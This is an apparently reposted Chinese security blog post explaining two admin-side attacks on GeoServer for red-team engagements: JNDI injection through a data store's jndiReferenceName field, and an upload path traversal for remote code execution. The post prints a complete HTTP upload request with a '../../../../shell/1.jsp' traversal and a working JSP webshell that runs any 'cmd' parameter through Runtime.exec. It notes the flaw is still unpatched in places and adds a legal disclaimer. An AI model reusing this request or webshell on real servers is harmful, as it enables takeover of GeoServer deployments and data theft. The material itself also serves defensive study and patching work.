geoserver漏洞解析以及测试方法

admin 2024年7月20日23:49:33评论44 views字数 1684阅读5分36秒阅读模式

 

相信各位师傅在HVV中,都遇到过geoserver系统,但是一般都是弱口令或者信息泄露、SSRF之类的,拿shell的案例不多,下面分享下geoserver系统后台的两种打法。

geoserver漏洞解析以及测试方法

geoserver漏洞解析以及测试方法

一、后台JNDI 注⼊

测试版本:Version 2.13.3

数据储存—》添加新的数据存储—》PostGIS (JNDI) —》jndiReferenceName *

geoserver漏洞解析以及测试方法

geoserver漏洞解析以及测试方法

geoserver漏洞解析以及测试方法

使用CB1链,弹个计算器

geoserver漏洞解析以及测试方法

二、GeoServer后台文件上传致远程代码执行漏洞

测试版本:Version 2.22.2

geoserver漏洞解析以及测试方法

geoserver漏洞解析以及测试方法

修改相对路径为绝对路径,即可愉快的上传webshell了。

geoserver漏洞解析以及测试方法

geoserver漏洞解析以及测试方法

我了个去,不解析jsp

geoserver漏洞解析以及测试方法

geoserver漏洞解析以及测试方法

换war包用tomcat部署

geoserver漏洞解析以及测试方法

geoserver漏洞解析以及测试方法

geoserver漏洞解析以及测试方法

POST /geoserver/rest/workspaces/nurc/coveragestores/mosaic/file.shp?filename=../../../../shell/1.jsp HTTP/1.1

Host: localhost:8080

Content-Length: 370

sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"

sec-ch-ua-mobile: ?0

Wicket-FocusedElementId: id39

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36

Content-Type: multipart/form-data; boundary-----WebKitFormBoundaryfoycybhDiQZEqxoy

Accept: application/xml, text/xml, */*; q=0.01

Wicket-Ajax-BaseURL: wicket/bookmarkable/org.geoserver.web.data.store.CoverageStoreEditPage?7&storeName=mosaic&wsName=nurc

X-Requested-With: XMLHttpRequest

Wicket-Ajax: true

sec-ch-ua-platform: "Windows"

Origin: http://localhost:8080

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Referer: http://localhost:8080/geoserver/web/wicket/bookmarkable/org.geoserver.web.data.store.CoverageStoreEditPage?7&storeName=mosaic&wsName=nurc

Accept-Encoding: gzip, deflate, br

Accept-Language: zh-CN,zh;q=0.9

Cookie:JSESSIONID=52159346772CE228794C0E097A442D9F

Connection: close

<%

if(request.getParameter("cmd") != null) {

java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();

int a = -1;

byte[] b = new byte[2048];

out.print("

");

while((a=in.read(b))!=-1) {

out.print(new String(b));

}

out.print("


");

}

%>

geoserver漏洞解析以及测试方法

该漏洞虽然已公布部分 poc但仍处于 1day状态,请勿用于违法用途,仅做测试环境交流学习。由于该系统弱口令使用情况较为广泛,建议受影响的用户尽快修复漏洞。

 

原文始发于微信公众号(F12sec):【转载】geoserver漏洞解析以及测试方法

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月20日23:49:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   geoserver漏洞解析以及测试方法https://cn-sec.com/archives/2777047.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息